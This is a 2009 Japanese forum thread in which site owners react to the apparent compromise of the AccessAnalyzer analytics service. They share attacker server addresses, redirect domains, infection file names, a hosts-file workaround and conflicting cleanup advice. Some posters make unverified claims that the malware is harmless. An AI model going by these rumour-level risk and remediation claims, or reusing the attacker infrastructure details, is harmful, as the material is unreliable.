どかーん! (⌒⌒⌒) || / ̄ ̄ ̄ ̄ ̄\ | ・ U | | |ι |つ U||  ̄ ̄ ||  ̄  ̄ もうおこったぞう
>>747 スレでは2ちゃんねるの情報は信じられない、とか言ってるけど、
そのスレで引用されているニュースサイトでは、2ちゃんねるを引用している……
なんという矛盾……。これはギャグなんだろうか
たぶん2chソースは信じられないって言い続けてるのは同一人物なんだと思う きっと勤務時間内なんだろう 昨日の昼間も似たような流れになっていたよ
氏ね
764 :
Name_Not_Found :2009/07/09(木) 20:36:37 ID:sEDnQhFU
今北三行 有料版ならセーフなの? 出来る限り外したくないんだけど。
忍者とFC2は肌に合わなかったから出来れば使い続けたいんだが…… そろそろここにも見切りをつけるべきかのう……
サポートボード見ると、一応報告が入ってるんだよね。 それに対するテンプレ回答もされている。 サイトの改竄がされたことはちゃんと確認してるはずなのに、 なんで何の対応もしないんだろ。 今はとりあえず、被害を広めないような応急措置をするべきだろ。
んなワケない
769 :
726 :2009/07/09(木) 20:41:07 ID:???
変な流れだな。 とりあえずアクアナの件は怪しい。 微妙なのがVDの件だけど…どうだろうね。
やっと全部外したよ
772 :
Name_Not_Found :2009/07/09(木) 20:59:27 ID:RcwTJB77
今頃XREA&VDユーザーは必死でバックアップ取ってるのかな それとも様子見で一切アクセスせず放置か XREAサーバこの数日でアクセス激減かね
まだ放置してんのかよ糞XREA
アクアナ終了。
逆に考えて、放置せざるを得ない状況なのではないのだろうか すなわち、管理者側がサーバーにアクセスできない、login.phpを編集できないだとか まあそんなことあったら本当にクソだけど
>>769-770 怪しいもヘッタクレも無く真っ黒だろ・・・
アクアナは明らかに異常な偽装まみれのスクリプトが仕込まれてるのでクロ。
VDは明らかに異常な偽装まみれのスクリプトが仕込まれていたログが魚拓に残っているのでクロ。
魚拓が貫かれた可能性は否定できないが、既に低いVDの信用を落とすためだけに魚拓を貫くとかワケ分らないからその可能性はとても低い。
誰かも書いてたけど、ウィルスの感染源なんだから 鯖全部ネットから切り離すくらい潔くすべきだろJK アクアナにしても丸一日以上放置とか GENOと同じことやってんだからタチ悪いな 因果巡ってるとしか思えねえ
>>738 scriptタグ中に
SRC="エイチティティピ://j1.ax.xrea.com/l.j?id=****"
noscriptタグ中に
A HREF="エイチティティピ://w1.ax.xrea.com/c.f?id=****"
IMG SRC="エイチティティピ://w1.ax.xrea.com/c.f?id=****&url=X"
が入ってる。idの****は本当は数字
スクリプトまだあるのに何のアナウンスもないんだね
780 :
726 :2009/07/09(木) 21:54:05 ID:???
>>770 そうだな…
アクアナの件については、担当部門の回答待ちなんだけど、
それなりに報告があるから改ざんされた可能性が高い。
逆にVDの件については、サポートの人が否定してたのと
被害報告がほぼ皆無だから改ざんされた可能性は低い。
でいいか?
>>778 んーそれは大丈夫っぽいね。何も降ってこない。
で、アクアナの方は現時点でも改竄放置なの? ヘタレな俺は怖くてアクアナのindexページにすらアクセスできんのだが
放置したままだね
今までの糞対応、スレの反応をみてまだわからんのか? やめとけ
報告した人のサポートBBSでの書き込み sb.xrea.com/showthread.php?t=5609&page=25 サポートの方には、連絡はしてますが・・・ 普通であれば、閉鎖対応すると思います。 相変わらず 変わらないですよね・・・ カスタマーサポート(受付部門)では対応できませんため、担当部門に申し送りさせていただきます と連絡来て・・・ 同じ内容に・・・ そのため、本件につきましては、真偽確認の上、そのような状況にございました場合は、担当部門判断においてご案内させていただきます。 但し、あくまでも、私どもは申し送りを行なうところまでの対応になりますことから、 ●実際に障害が発生していた場合 → 障害ページなどでの一括連絡 ●事実確認できない場合 → 連絡は行なわない という形のご対応になる場合もございますことを、あらかじめご了承いただきますようお願い申し上げます。 と書かれています。真偽を確かめて、かつ 対応を待つしかないのでしょう!!
ニュースで大きく取り上げられればいいよ
789 :
Name_Not_Found :2009/07/09(木) 22:59:20 ID:tKCHYfqA
韓国サイバーテロと関係ありますか?
アクアナまだバラまき続けてんのかよ。GENOの二の舞じゃん、結果的には。 ただGENOと違うところは販売は販売でもネット上で鯖やドメイン 無料であれネット用のツール貸してる会社ってことだ。 物販じゃないから余計に信用問題になると組織は死活問題だろ ソースも2ちゃんだけじゃないしニュースサイトにも出始めてる。 サポートも対策もアレではユーザーから信頼なくす一方だとオモ 787の >実際に障害が発生していた場合〜 ここにいる私みたいなメモ帳タグ打ちな素人が過去ログを見て 該当のソースのタグ見ただけでも異常くさいって分かるんですけどね ノートン先生やカスペル先生もいつもより神経質に反応してるし ユーザーも異常があるから問い合わせしてるんじゃないのかね
ひとまずVDとアクアナの閲覧は自己責任で。 家族と共有PCの人は教えてやれよ ブクマも整理してしばらくアク禁にでもしといた方がいいかもな。
ホスティング業やっててコレってのは、GENOとは比較にならんよ >ニュースサイトにも出始めてる。 どこに出てるんだ? ソース
795 :
Name_Not_Found :2009/07/09(木) 23:10:46 ID:MbYcS9wT
VDが0day攻撃ってとこまでは、外のサイトで記事出てるよ
>>635 そろそろセキュリティ系の会社も動くだろね。
ここ最近GENOのせいで忙しかっただろうから
バスターもそろそろ対策も早めると見てる。
九州はイカリソース 関東はブルドックソース?
どっかの辺鄙な極東の小国が外交カードの ミサイル代捻出するために ウイルスばら撒いてるじゃないかと思う今日この頃
まあ穿ちすぎだけど、リダイレクト先が中国ドメインじゃねorz 実際の中国は検索ひとつにさえ制限あるくらい ネットの取り締まり厳しいくらいなのにな GENOといいアクアナといい中国ドメインばかりが感染源だと哀れだよ パス盗むとかサイト改ざんとかこの手の犯人は何考えてるのか分からん
>>795 いや… それは前から知ってるけど…
>ソースも2ちゃんだけじゃないしニュースサイトにも出始めてる。
なんて自信満々に言うからにはせめてITmediaとかGIGAZINEあたりで書かれてから言ってくれよって話…
>>799 キーロガーしこむあたり、カード情報盗んだり
ネトゲのID盗んでRMTしたりして現金化したいじゃないかな
特にRMTは手順は面倒くさいが確実にロンダリングできるし
しかも外のサイトといいつつ、その引用元が2ちゃんねるでは……
ITmedia(笑) GIGAZINE(笑)
黒幕はトレンドマイk・・・
トレンドマイクロは最近職場にライセンス更新案内の電話をかけまくってきてうざい
セキュリティ対策キタ---- >805 今回のウィルスはリアルなことだからアンチバスター乙とか言われるよw
2ちゃんねるだからっていうのは実際どうかとは思うよね
結局
>>804 の件なんて、もろ
>>563 とかでもう書いてあるし
他のスレでは7/6時点で、すでに検証とかで同じ答えでてるんだよな
まぁ、信用するかまでは自分で決めることだしね
>>810 英語の原文はあってるから、たぶん翻訳ミス
こんだけ情報が錯綜してるとさ 個人的にはこれは正しいと考えられる情報まで信憑性疑ってしまうよね 現に鯖板のVDスレではワケワカメな状態も続いてたし >804とかの大手の対策を見て あらためてここの情報が確かだってことに箔がついたというか 信じられそうな情報に関しては8割程度に見てる 予防や対策なんかはGENOと同じって何度も書かれてるし むしろOSやプラグインのアップデートくらいは当然で考えてたから ここ来て速攻アクアナのタグ外したしホームも見ないようにした ここの書き込みだけでも、わりとこれで大丈夫かと安心したのも確かだ チラ裏ですまん
Adobe更新 fixit
>>814 違うと思う。そこの画像だと2MB以上のファイルが投下されているけど
そんなデカい物じゃない(100kBかそこら)。
今北だが 少し前に解析見たらカスペ先生がよく分からん画像ファイルをトロイとして検出したのはこのことだったのか ウィルス対策で駆除しとけば一応大丈夫なもんなの?
>>815 違うのかー。
マカフィー使いだから対応してるのかなーと思って。
不安。
AccessAnalyzerのサイトを開いちまったから、パソコンを再インストールした。 今はサイトとブログ内の AccessAnalyzer のタグを Google のアクセス解析に差し替えてる。 今夜は徹夜ぢゃ… (´;ω;`)ウウッ…
低レベルってことは 別に感染しても別に悪さはしないんじゃ? 少しオーバーに騒ぎすぎじゃないか 自分は使ってるけどバナーはずしもしないし特に告知もしないよ 閲覧者を無意味に怖がらせるほうが良くない
悪さはします
>>819 そういう意識でサイト運営するの危ないと思うんだけどなあ
被害者増やすかもしれないってわかってて止めないのって
それはもう加害者だよね
サイト訪問者の理解力が低いなら中途半端に告知するんじゃなくて
しっかり説明すればいいだけじゃないの
で、実際どんぐらいこのウィルスがやばいのか分かりやすく説明してくれ
お断りします
要するにやばくないんだよ やばくないものをサイトで説明する必要もない
ネタレスうぜえ
>>824 ありがとなー
おまいさん、いいヤシだー ・゚・(´Д⊂ヽ・゚・
でも、実はもうすでに文字列一括置換ソフトは持ってるので、
タグの貼り付けはすぐに終わりそうなんだけど、
Googleのアクセス解析が初めてなもんで、
そっちが手間取っちゃってるんだw
Googleのアクセス解析って高機能っぽいけど、
なかなか難しいなw(´∀`;)
>>829 ブログ系の奴が簡単かと。機能はアレだけど。FC2と忍者使ってる。
831 :
829 :2009/07/10(金) 03:23:10 ID:x12DebF6
やっと終わったー (´∀` )
>>830 色々とありがとなー (´ω`)
でも折角なので、今回のこの一件をバネにして、
高機能アクセス解析にトライしてみるのもいいかなと思って頑張ってみたw
(アドセンスも使ってるし)
GoogleAnalyticsよりもYahooアクセス解析の方がアクアナに近いよ
アクアナは不正コードをいつまで放置する気なのか
もうアクアナのタグはサイトから外したしホームもしばらく見ない
IDも全部消したいけど危険おかしてまで行きたくないから
安全確保できるまではVISTAでも見ないでおくことにしたよ
知人もXREA鯖で感染はしてない様子だったけどもう移転するってさ
有料だったけど残り1カ月程度あるけど安全に代えられんて嘆いてたな
しかし感染源の対応の遅さがGENO以下になってきて気持ち悪いな
過去ログ見たらセキュリティメーカーの対応も始まってるみたいで安心したけど
ひとまずここも読んどけ
マイクロソフト セキュリティ アドバイザリ (972890)
Microsoft Video ActiveX コントロールの脆弱性により、リモートでコードが実行される
http://www.microsoft.com/japan/technet/security/advisory/972890.mspx
loginページだけじゃなくて他のページでも例のコードが確認できるぞ、ゴルァ!
もし今日対応しなかったら、 土日は休みで放置?
だいたい3週間は対策にかかる。
このスレ開くとマルウェアの警告が出るんだが
>>840 そっちから入っても、ログイン後に解析画面で生ログとか見ようとすると
再度ログイン画面になって、何度ログインやっても見れないんだよなぁ
リファラとか見てんのかねぇ
219.101.229.189 ax.xrea.com とhostsファイルに書いてみた もう解析タグ外したけどな
ちょっと前にトロイをブロックしてたのはコレーーーー? IE7でウイルスバスター。 3日前から会社のIE落ちまくりで仕事に支障が(泣) 火狐も同時に開いてるけど アクアナはIE表示のほうが好きなんよね。 よく分からないから静観するしかないわ。。。
ソースnextのソフトはアクアナのスクリプトコードに対応済み
そんなソフトだれもつかってないでしょ
vistaだが、アクセスしたら急に動作が重くなったんだが・・・ ノートン先生は逐一激怒
Kingsoft SecurityCare Kingsoft PersonalFirewall Kingsoft AntiVirus 無反応なんだが
ソースネクストのウイルスセキュリティ0でも Exploitコードを検出削除しましたと出るようになったね
850 :
Name_Not_Found :2009/07/10(金) 12:32:56 ID:OlUmAIuz
誰もそんなフリーより使えないソフト使ってないと思いますよ
ジャパネット高田でPC買うようなおじさんおばさん辺りなら 案外使ってる人いるんじゃないかな
売り上げNo.1とか銘打ってなかったっけ、あのソフト
安いからって理由で、無料アンチウイルスソフトよりも 糞なセキュリティソフト使ってるやつって何なの はっきり言ってそんな奴はここで避けられてもどこかで痛い目みる
何でセキュリティソフト叩きしてんの?
早くid削除したい
敵のサイト繋がらなくなってね? 110.165.41.103:888 次は何仕込まれるやら
pingも飛ばなくなったわ
まさかこんな終わり方とは想像も付かなかった
>>844 それは本物のGenoじゃなかろうか
静観するんじゃなく自分のPCについては自分で対応をしましょう
まぁ敵は他にもサーバ持ってるからなぁ。 お引っ越しするかもしれないのでなんとなく置いときますね。 fccja.meibu.com 125.77.62.231 2102214375 0x7D4D3EE7 fccja.com (繋がらない) 114.113.130.112 1920041584 0x72718270
>>787 昨夜問い合わせフォームに送ったら
今朝全く同じ返信が来たわ。コピペかよ…。
>>862 何をすればいいのか・・・
ウイルス検索してももう何も出てこないけど
今日は3回IEが落ちた。
2つブログ管理してるけど、両方タグは外しました。
携帯も外したほうがいいのかな?
>>864 わざわざ毎回文面変えるメリットはないからな。
accessanalyzer.com
↓
ax1.xrea.com (219.101.229.189 やられてない)
x1.ax.xrea.com (219.101.229.189 やられてない)
もうこれに絞ればいいんじゃね?
腐った188は切ってくれよ。
ax2.xrea.com (219.101.229.188 やられてる)
x2.ax.xrea.com (219.101.229.188 やられてる)
あとこれは使ってないの?
ax3.xrea.com (219.101.229.186 やられてない)
x3.ax.xrea.com (219.101.229.186 やられてない)
186と189で回せばいいんじゃね?
ttp://ax1.xrea.com/ ttp://ax3.xrea.com/ これで使えればいいんだけど、どうだろう。
一連の騒動、敵のサーバ(110.165.41.103)が繋がらなくなったので とりあえずこれがあったら感染というファイル名をコピペしておきますね。 windows\system32 の中に carrsv.dll diskcheck.exe flashaegh.dll mnpse.dll ntst.dll
>>865 それだけじゃウイルスなのか変なソフト入れて不安定なだけなのか
ハードウェアの問題なのかわからんね
バックアップとってOS入れなおしが安全
入れなおす際にはセキュリティ対策ソフトを入れるまでLANケーブルは抜く
その後、OS、セキュリティ対策ソフト、Adobe他各種ソフトを更新+今回の回避パッチ
入れなおしに時間かかるといっても、いつまでも業務に支障をきたすよりはマシだし
スパム送信とか他人に迷惑かけだしたらシャレにならんでしょ
可能性低いけどハードウェアの故障が原因だとしたらそのうちPC起動しなくなるかもしれない
そういう意味でもバックアップを取っておいたほうがいいよ
>>868 diskcheck.exeに反応したので拒否した。
会社のPCを私物化して個人のブログに解析をつけているから OS入れ直すとか上司に言えない事務員の私・・・。
ああそう
>>871 メンテ要員の下っ端にこっそり相談しろよ
後で全社的に問題になってもしらんぞ
会社の備品に損害出して仕事遅らせて、優秀なDQNですね
>>871 仕事で見てもおかしくないようなサイトの中から、
アクアナのバナー貼り付けてるサイト見つけて、
間違ってクリックしてアクセスしてしまったということにしたら?
>>868 ありがとう。
検索してみました。
感染してないとは思っていても、検索してる間どきどきした。
878 :
871 :2009/07/10(金) 16:06:53 ID:???
>>869 さん、ありがとう。
私へのレスでした。
変なソフトは特にないです。2ちゃん専ブラぐらい。
>>873 職場は個人経営の事務員で、他は年配だから私よりPCに詳しい人はいない。
事務所にPCは3台。
>>875 仕事ブログと個人ブログの両方にアクアナを設置しています。
会社関係のブログ友達も大勢いますが
バスター入れてるのに感染とか言えません。
アクアナ使ってるお客さんがいたから即連絡してあげたら異様に喜んでもらえたわ しかもアクセス解析移転作業まで発注いただいた
>>878 バスターはカスペとかノートンとかより
対応が遅かったんじゃなかったっけ?
記憶が正しければ、バスターを入れていても、
仕事でアクアナの管理画面に入っていれば、
感染してもおかしくないといえるけど。
>>881 俺のノートンさん
でも別に2ちゃんって言っても構わなかったけどな
>>880 職場のPCはIEで仕事用のサイトとアクアナを1日中開いていて
火狐でブログ閲覧・巡回しています。
アクアナを閉じてからはIEが安定していますが
やはり感染は否めないのでしょうか。
>>868 これ、もし入ってたらどうするん? デリートすればOK?
デリできればね。もし存在していたら活動中だろうからそのままでは削除できないだろう。 SafeModeでとかmsconfig見るとかレジストリ検索するとかいろいろがんばって削除。
>>878 本人が意識せずに何かをインストールされている可能性もあるでしょ?
バスターいれてようが何入れてようが感染するものはします
あと
>>880 が言っているように今回バスターは対応遅かったと思うので感染濃厚
自業自得だよね
あきらめてOS入れなおしてください
ノートンがふせいでくれてるはずなんだが、なんかパソコン全体が重い・・・
>>886 やはりIEは1分持たずに落ちまくってます。
上司が帰社しました。
告白します(泣)
サポートボード、なんで常連さんは今件にコメントしないんだろ。 やっぱり、xreaに雇われてるってことなのかな?
ログインしないと書けない でも、ログインすると危険
>>890 いや、他の記事にはコメントしてるのに
今件には触れてないから。
レス番ずっと間違ってるよー
>レス番ずっと間違ってるよー それはどのコメントに対して書いてる?
>>889 独り言スレッドに「うの字」とかいう表現で書いてる人が約1名いる。
>>894 あえて触れなかったんだけど、一応知ってます。
ただ、そのひとりだけでしょ。
猫のアイコンの人とか、いつもはもっと書き込んでるのに。
このウイルスっていつから出たのかな? 最後にログインしたのが月曜日だから不安だ バスターではウイルス検知しなかったけどどうなんだろう ニフティオンラインとかでは引っかかる?
自分は7月5日と6日が変わる頃の 夜にはノートン先生が警告出してたな グレーゾーン疑うなら黒で考えた方がいい
>>887 PC内のインターネット一時ファイル(クッキーなども全部)を削除する
最新版データのウィルススキャンでPCの全システムをウィルススキャンする
ドライブのディスククリーンアップを行って不要なファイル類を消す
ネットから切ってセーフモードで起動→再起動
あとどうしても疑わしくばリカバリかクリーンインスコ推奨
結局xreaは何もしないままか…
バスター無反応なんだけど オンラインスキャンはどこが良いんだ
そもそもオンラインスキャンはあまり頼りにならん
すごいな…ここのサービス 改竄でウイルスコードが仕込まれているのに放置するとか… 信用とかどうとかの問題以前だ
>>902 うん。しかもこれ初めての事じゃないんだぜ
diskcheck.exe があったから削除したんだけど これってすでに感染してるのかな? 警告でてスキャンかけたら一応大丈夫だったんだけど…
>>902 昔からこんな感じです。でも今回は個人情報が今も抜かれている可能性があるので放置は犯罪かも。
今知ってタグ全部はずしました。 ここって退会はどうするんでしょうか・・ページのどこも飛べません。 ログアウトして一生ログインしなきゃいいのでしょうか・・。 誰か、すみません教えてください。
私も退会したいのですが、ログインページにウイルスがいるようなので恐くて入れません。 今はこちらも放置するしかないのでしょうか?
放置プレイ継続中
まだ修正されていないの? なんなのここ? 死ぬの?
皆さんご存知の通りここはもう死んでます
_,l;;;;;;;;;;;;;;;;;;;;;;;;;;;l,,_ ,.r'´,. -┐ ':..,゙ヽ ,r' ,::;:' ,ノ ヽ、 ゙:::.ヽ ,.' _.,:;:'___ _立_ ___;;ミ゙、  ̄ノ ̄| ̄ .l厄巳厄巳厄 i王i ,.巳厄巳厄巳l ,勹 .├‐'' l´ , "´  ̄ ̄ ̄ `'''′  ̄ ̄ ̄`.:`{ ´_フ ヽ、_, | l ;;:.,. ::、. ... '゙| ,.-''、.,! ,.::' ヽ、:.゙、 ;;.:' '' ヽ | ,.、 __l__ ./ 、/ `ヾー─tッ−ヽ'' kーtr─ツ'´〕. ヽ. | / {´i Y::::.. ` ̄ ̄´.: "i! ::. 、` ̄´ ゙:::.、} r、 l i,____ | ヾ_,,入;:::.. `'' " ´.::; .::i! ::.. ``` :. }ツl l \ ノ ヾ ;:::. .:r'' :: ll! :ヽ;:..:. .: j,ノ ,! ┬‐┌,┴┐ ヽ',,;l ゙i ;::.. _ `ヽ、;;,,,,'.ィ'' _,, .::,;r'1,,,/ l__ ノl士 ッジ::::::| ゙ ,r'´:::;;;;;;;::> 弋´;;;;;::::ヽ'" |:::::゙'イィ ノ凵 l土 弍:::::::::::l /:::;r'´ ,,..-ー…ー-、 ヾ;:::'、 |:::::::::::ヒ シ:::::::::::l i':::,! ´ __ ゙ l::::l:. |::::::::::ス __ヽ__‐┬┐ 彡;:;:::::l l:::l ''''''''⇒;;;:, l:::l |::::;;ャ` ニ メ ,ノ ,r', 广'`ヽl:::l ::::. .:: ゙::. l::l ノ^i`、 l ̄l ハヽヽ ,イ(:::j i::;ヘ :;:. .:: l::l'" l:ヽヽ  ̄  ̄ |;:ヽヽ l::l ヽ ;:.... .. .. : /l::l ノ ,.イ |;:;:;:;\\ l::l ', :;.:;::::::::::..::. / l::l,r'' /;:;:;|
この期に及んで普通に使ってる俺が通りますよ、と。
おいらも普通に使ってますよー。 個人的には皆さんが出て行ってくれると嬉しかったり。
ま、マルウエア配布サイトとしてGoogleに紹介されてもいいならそれで
知っていてバナー表示で使っているのなら犯罪幇助だな といいつつオレも使っているがw どうしようかorz
大丈夫じゃね? 害があるのはログインページでしょ
ログインページだけじゃないよ
確かトップページから全部感染だっけ
試しにバナークリックしてみ 俺はしないけどw
つまり解析を付けているサイトは有害マルウエア配布サイトかよ
過去ログで誰かも書いてたけど、 アク解探してて何も知らずバナー踏んだりしたらそれこそ二次被害じゃん ネット片隅で感染源とかボット扱いされてもいいなら使ってれば? 同人つかヲタ界隈まで騒ぎ出してるからな 使い続けてるとくだらない噂を立てられそうだし居場所なくなっても知らんよ
解析バナーをクリックしなきゃ大丈夫なんすか?
>>924 あんであんたみたいなのがweb製作板にいる
有害サイトの作者か?
あちこちにこのスレのリンク張られてるからじゃね 流行のウイルスだって
同人から流れてきたんだろ
>>924 過去ログ読め、読むだけじゃなくて正しく理解してくれ
自分で調べようともしない教えてちゃんは叩かれても仕方ないよ
923は解析タグを全ページ外す事が前提で言ってんだと推測する
自分もXREA系のツール類はカウンタまですべて外したけどな
北のサイバーテロじゃないの?
有料アクアナ使ってます。 サイト更新用のPCが今使えなくてタグを外せないんだが バナー非表示なら、とりあえずサイト訪問者に害は無いかな…?
今となっては直接アクアナのホームに飛ぶ自体NGだからな。 今すぐタグを外せないなら、閲覧者がバナー踏まないように 少しでも配慮した方が賢明だね。 でもスクリプト本体は残されてるからそれだけで安全とは言えないだろうけど。
ここがウイルスをばらまいているアクセス解析の本スレですね ここがウイルスをばらまいているアクセス解析の本スレですね ここがウイルスをばらまいているアクセス解析の本スレですね ここがウイルスをばらまいているアクセス解析の本スレですね ここがウイルスをばらまいているアクセス解析の本スレですね
933 :
930 :2009/07/11(土) 02:09:45 ID:???
有料のを使ってるから、バナーは無いんだ。
試しに自分でサイトを閲覧してみたが、なんともなかった。
解析タグが入っててもバナー非表示なら、今んとこセーフってことか?
でも念のために、PC使えるようになったらタグ外しておくよ
レスtnx
>>931
実際のところ、ガセネタというか、ログを読むにウイルスに対する過剰反応が多すぎると思う いろいろわざと感染させたりしてしらべたけど ・Windows XPでアナウンスのあった対応をしていない ・Adobeやその他アプリケーションが最新でない ・セキュリティソフトをインストールしていない。インストールしていても定義データベースが古い この条件がすべて成り立たないと前と後で変化を観察するかぎり感染はしない様子 またはセキュリティソフトが対策されるまでトロイは抜けていただろうから、レジストリの書き換えまではされていてだろうが、 その次のウイルス本体による汚染まではいかない。ウイルス自体は既知のもの 危険度自体は低い。 でも、感染すると、情報を送信しようとするからネットワークは確かに遅くなるが、気づかないだろう 削除と生成の無限ループに入ると別だが あと ・バスターは確かにトロイには対応してなかったが、ウイルスには対応していたから、致命的な問題はない でも、俺が試したっていうのもガセかもしれないから、信じる必要はないよ 基本はログに乗ってる検証情報と差はないけど、自分で検証するのが安心できる一番の手段だよ
カウンタまで全て外す って、カウンタなんて5/30から続くVDのネームサーバ 障害の影響で一ヵ月以上まともに(ほぼ常時)稼動して無いじゃん。 本当に使ってた人間ならその事知らん筈はないんだが。
でも、WindowsUpdateとかウイルス対策ソフトの更新って、
結構そういうこと何も知らない人はしてないこと多いんだよね
セキュリティソフトをインストールするだけで更新しなくても安心してしまう人とか、
更新可能な期限をすぎてもそのまま使い続けてしまう人とかが
PCとかネットに興味ない人だとかなりいるのが現実
それだと
>>934 の条件にひっかかって感染してしまう
サイトに見に来てくれるユーザーのことを考えると、やはり今の状況はだめなんだよね
早速「アクアナ トロイ」でぐぐってうちに来た人がw
>>934 >自分で検証するのが安心できる一番の手段だよ
とはいうものの
過去ログの
>>563 とかでやっているような
jpgファイルの中身をテキストとして開いて、これはスクリプトでしかも有害だ! と判断できるというレベルを
みんなに要求することはできない
正解だったわけだが、俺にとっては今でもコードからは理解不能
ノートンとか有名どころのアナウンスで初めて信頼できた
>>934 ウイルス自体は既知のもので、バスターでも対応してたと言い切れる?
今回の一件で
ノートン・カスペ>>>>バスター>>>
>>0 円(笑)
という構図が証明されたわけだ
>>940 あそこのウイルスは国内でメジャーなとこは対応してたとおもうよ
ただ何らかの保障を求めるなら
>>934 ではなくバスターさんに問い合わせてください
>>942 断定口調で書き込んでるから、突っ込んだだけだよ。
なんと半年待たずに次スレが必要になるとは誰が想像し得たでしょうか
>>868 の5つが見つからなかったら感染してないってことでおk?
しかしあれだな 一番の問題は今もアクアナが改竄されたウイルス入りのページを放置していることだよな
信用欠くような真似はしないで欲しい 気に入ってんだからさぁ、ここの解析は
し、信用?
次スレだれか立ててくれ 立てられなかった
まだいいよ
復旧した?
適当に色んなサイト見てきたが、まだ付けているブログが多いね。 と言うか、殆どの人が今回の件を知らないと思うw 2ちゃんをみているのは一部だろうし
俺だってFC2ブログスレを見ててこの件を知ったぐらいだからな
異様に重いから来たが、こんなことになってるとは Vista+Firefox+ノートンだから、実害はなさそうだが…
感染したぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁ シネよこの会社!!!!!!!!!!!!!!!!!!!!!!!!!1111111111111111111
- xreaにウィルス進入中 - スレから来ましたw
どこの板にそんなスレ立ってんだ?
この情報は広く知らせる必要があるから むしろどんどん他板にもリンク貼って周知すべきだと思うんだ Web制作者であるとかないとかそういったセクショナリズムは今は取っ払った方がいい
この板開いたらウィルス反応が出た
おい、マジでこの板からウィルス反応出たぞ どうしてくれる
ちゃんと対策できてるってことだろ
>>554 で、コピペされたJavascriptのコードに反応しただけだから。
セキュリティーソフト何使ってんのよ 脳豚じゃね?
脳豚って一瞬何のことかと思った。ノートン先生かw 粕屁ですよ
970 :
Name_Not_Found :2009/07/11(土) 10:51:46 ID:DOhu+Sph
さっき削除した。 もうにどと使わない。 代わりにi2i入れた。これでいいや。
大事なことだから二回言いましたw
要するに、大事なことなので二回言いました
大事なことなので二回言いましたも大事なことなので二回ry
こんな調子でスレ埋めてくならそろそろ次スレ必要かも
早く埋めろ
早く潰れろ
なにおまえら まだやってたのww
マゾですから
このウイルス騒動の流れも、ちゃんと次スレのテンプレに入れといてねー 入ってなかったらデジロ社員がスレ立てたとみなすよw
やってくれてるね わかってる限りの関連スレ一覧もよろしく
ウイルスばらまき継続中
で 直ったの?
改竄はたぶんまだ直ってない。 仕込んでた方が今活動停止中らしいけど。
この会社って本当に社員いるのか
修復ってそんなに技術的に難しいのかな???
ログインする勇気がありません。 誰か今日ログインした人いますか?
いません
ログインしなくてもログインページアクセスした時点でアウトなんだからログイン関係ない
993 :
924 :2009/07/11(土) 12:49:45 ID:???
>>925 web制作者じゃないけど、アクアナ解析使ってるサイト見ちゃったもんで。
java切って火狐でログインしてみた もちろんadobe関係は最新 とりあえずavastは怒らなかった… 怖いからもちろんリカバリするけど もう別サーバー用意したからネームサーバーの変更だけやった サーバーもアク解もドメインもここで一元管理していた俺負け組\(^o^)/ 復旧したらドメイン移管もしたい あそこはもう怖くて使えん
>>996 javascriptを略すときは、jsの方がいいと思う。
違う意味に取られるから。
>>997 ああ、すまん
切ったのは確かにjsで間違いないです
パソ2台あるから1台を犠牲にして試した結果
お
ひろゆき最高( ̄ー ̄)ニヤリッ
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。